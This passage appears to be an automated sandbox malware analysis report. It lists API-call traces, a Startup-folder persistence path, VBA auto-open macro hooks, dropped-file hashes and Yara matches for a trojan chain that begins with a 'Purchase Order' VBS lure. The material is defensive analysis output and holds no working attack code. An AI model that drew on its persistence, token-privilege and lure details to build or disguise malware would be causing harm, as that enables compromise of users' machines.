                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe Code function: 22_2_0089AC99 NtdllDialogWndProc_W,22_2_0089AC99
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe Code function: 22_2_008EECBC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,22_2_008EECBC
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe Code function: 22_2_0089AD5C NtdllDialogWndProc_W,74E4C8D0,NtdllDialogWndProc_W,22_2_0089AD5C
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe Code function: 22_2_008EEFA8 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,22_2_008EEFA8
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe Code function: 22_2_0089AFB4 GetParent,NtdllDialogWndProc_W,22_2_0089AFB4
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe Code function: 22_2_008EF0A1 SendMessageW,NtdllDialogWndProc_W,22_2_008EF0A1
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe Code function: 22_2_008EF122 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,22_2_008EF122
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe Code function: 22_2_008EF3AB NtdllDialogWndProc_W,22_2_008EF3AB
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe Code function: 22_2_008EF3DA NtdllDialogWndProc_W,22_2_008EF3DA
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe Code function: 22_2_008EF37C NtdllDialogWndProc_W,22_2_008EF37C
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe Code function: 22_2_008EF425 NtdllDialogWndProc_W,22_2_008EF425
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe Code function: 22_2_008EF45A ClientToScreen,NtdllDialogWndProc_W,22_2_008EF45A
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe Code function: 22_2_008EF594 GetWindowLongW,NtdllDialogWndProc_W,22_2_008EF594
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe Code function: 22_2_0089B7F2 NtdllDialogWndProc_W,22_2_0089B7F2
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe Code function: 22_2_0089B845 NtdllDialogWndProc_W,22_2_0089B845
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe Code function: 22_2_008EFE80 NtdllDialogWndProc_W,22_2_008EFE80
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe Code function: 22_2_008EFE7D NtdllDialogWndProc_W,22_2_008EFE7D
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe Code function: 22_2_008EFF91 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,22_2_008EFF91
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe Code function: 22_2_008EFF04 GetClientRect,GetCursorPos,ScreenToClient,NtdllDialogWndProc_W,22_2_008EFF04
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 31_2_001229C2 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,31_2_001229C2
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 31_2_001902AA NtdllDialogWndProc_W,31_2_001902AA
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 31_2_0018E769 NtdllDialogWndProc_W,CallWindowProcW,31_2_0018E769
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 31_2_0018EA4E NtdllDialogWndProc_W,31_2_0018EA4E
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 31_2_0018EAA6 ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,31_2_0018EAA6
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 31_2_0013AC99 NtdllDialogWndProc_W,31_2_0013AC99
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 31_2_0018ECBC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,31_2_0018ECBC
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 31_2_0013AD5C NtdllDialogWndProc_W,74E4C8D0,NtdllDialogWndProc_W,31_2_0013AD5C
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 31_2_0013AFB4 GetParent,NtdllDialogWndProc_W,31_2_0013AFB4
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 31_2_0018EFA8 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,31_2_0018EFA8
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 31_2_0018F0A1 SendMessageW,NtdllDialogWndProc_W,31_2_0018F0A1
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 31_2_0018F122 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,31_2_0018F122
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 31_2_0018F37C NtdllDialogWndProc_W,31_2_0018F37C
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 31_2_0018F3AB NtdllDialogWndProc_W,31_2_0018F3AB
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 31_2_0018F3DA NtdllDialogWndProc_W,31_2_0018F3DA
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 31_2_0018F425 NtdllDialogWndProc_W,31_2_0018F425
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 31_2_0018F45A ClientToScreen,NtdllDialogWndProc_W,31_2_0018F45A
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 31_2_0018F594 GetWindowLongW,NtdllDialogWndProc_W,31_2_0018F594
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 31_2_0013B7F2 NtdllDialogWndProc_W,31_2_0013B7F2
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 31_2_0013B845 NtdllDialogWndProc_W,31_2_0013B845
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 31_2_0018FE7D NtdllDialogWndProc_W,31_2_0018FE7D
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 31_2_0018FE80 NtdllDialogWndProc_W,31_2_0018FE80
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 31_2_0018FF04 GetClientRect,GetCursorPos,ScreenToClient,NtdllDialogWndProc_W,31_2_0018FF04
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 31_2_0018FF91 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,31_2_0018FF91
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 15_2_0016702F: DeviceIoControl,CloseHandle,15_2_0016702F
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 15_2_0015B9F1 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,74F65590,CreateProcessAsUserW,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,15_2_0015B9F1
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 15_2_001682D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,15_2_001682D0
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe Code function: 22_2_008C82D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,22_2_008C82D0
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 31_2_001682D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,31_2_001682D0
                                Source: uvpPtB1E.xlsm.16.dr OLE, VBA macro line: Private Sub Workbook_Open()
                                Source: uvpPtB1E.xlsm.16.dr OLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                                Source: UNKRLCVOHV.xlsm.16.dr OLE, VBA macro line: Private Sub Workbook_Open()
                                Source: UNKRLCVOHV.xlsm.16.dr OLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                                Source: Joe Sandbox View Dropped File: C:\ProgramData\Synaptics\RCXD42.tmp 634238998B9CA21CE7558C5410FFD9D21E42AC069FFEB1B590EED99BAC7C1F02
                                Source: Joe Sandbox View Dropped File: C:\ProgramData\Synaptics\Synaptics.exe 7CBE965FA1278BA09C31E191C19AC1E2B52F940B656273872C805833AE03E276
                                Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\JPS[1].exe 7CBE965FA1278BA09C31E191C19AC1E2B52F940B656273872C805833AE03E276
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: String function: 00148AE8 appears 46 times
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: String function: 00132570 appears 42 times
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: String function: 0014247B appears 36 times
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: String function: 0014017E appears 45 times
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: String function: 00125CD3 appears 48 times
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: String function: 0012CAEE appears 48 times
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: String function: 00141BC7 appears 42 times
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: String function: 0013C619 appears 38 times
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: String function: 00150650 appears 38 times
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: String function: 0013E3CC appears 41 times
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: String function: 0013F885 appears 136 times
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: String function: 00147750 appears 84 times
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: String function: 008A7750 appears 42 times
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: String function: 0089F885 appears 68 times
                                Source: Purchase Order Summary Details.vbsInitial sample: Strings found which are bigger than 50
                                Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7744 -s 13324
                                Source: JPS[1].exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                Source: JPS[1].exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Source: update.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                Source: update.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Source: Synaptics.exe.14.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                Source: Synaptics.exe.14.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Source: RCXD42.tmp.14.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Source: ~$cache1.16.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Source: ._cache_update.exe.14.drStatic PE information: Section: UPX1 ZLIB complexity 0.988707228301187
                                Source: XNLAGO.exe.15.drStatic PE information: Section: UPX1 ZLIB complexity 0.988707228301187
                                Source: classification engineClassification label: mal100.troj.adwa.expl.evad.winVBS@26/77@14/5
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0016D712 GetLastError,FormatMessageW,15_2_0016D712
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0015B8B0 AdjustTokenPrivileges,CloseHandle,15_2_0015B8B0
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0015BEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,15_2_0015BEC3
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008BB8B0 AdjustTokenPrivileges,CloseHandle,22_2_008BB8B0
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008BBEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,22_2_008BBEC3
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_0015B8B0 AdjustTokenPrivileges,CloseHandle,31_2_0015B8B0
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_0015BEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,31_2_0015BEC3
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0016EA85 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,15_2_0016EA85
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_00166F5B CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,15_2_00166F5B
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0016EFCD CoInitialize,CoCreateInstance,CoUninitialize,15_2_0016EFCD
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_001231F2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,15_2_001231F2
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xml
                                Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\JPS[1].exe
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7820:120:WilError_03
                                Source: C:\ProgramData\Synaptics\Synaptics.exeMutant created: \Sessions\1\BaseNamedObjects\Synaptics2X
                                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7744
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeFile created: C:\Users\user~1\AppData\Local\Temp\BQQQVU.vbs
                                Source: Yara matchFile source: 0.3.wscript.exe.1941183d1b4.2.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 8.0.update.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000000.00000003.1307643273.0000019411A90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.1311247337.0000019410D85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000008.00000000.1309629259.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.1308511468.000001941172A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: C:\ProgramData\Synaptics\RCXD42.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\Documents\CZQKSDDMWR\~$cache1, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe, type: DROPPED
                                Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\JPS[1].exe, type: DROPPED
                                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Purchase Order Summary Details.vbs"
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                                Source: C:\ProgramData\Synaptics\Synaptics.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
